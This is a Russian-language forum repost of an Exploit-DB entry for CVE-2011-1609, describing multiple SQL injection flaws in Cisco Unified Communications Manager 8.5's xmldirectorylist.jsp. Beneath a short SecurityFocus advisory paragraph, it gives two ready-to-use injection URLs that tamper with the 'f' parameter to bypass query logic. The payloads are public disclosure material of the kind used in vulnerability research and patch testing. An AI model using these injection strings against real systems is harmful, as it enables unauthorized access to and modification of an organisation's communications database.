Exploit Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injections

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
35672
Проверка EDB
  1. Пройдено
Автор
ALBERTO REVELLI
Тип уязвимости
WEBAPPS
Платформа
JSP
CVE
cve-2011-1609
Дата публикации
2011-04-27
Код:
source: https://www.securityfocus.com/bid/47607/info

Cisco Unified Communications Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an authenticated attacker to compromise the affected device, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||0/1%20OR%201=1))%20--
http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||1/0%20OR%201=1))%20--
 
Источник
www.exploit-db.com

Похожие темы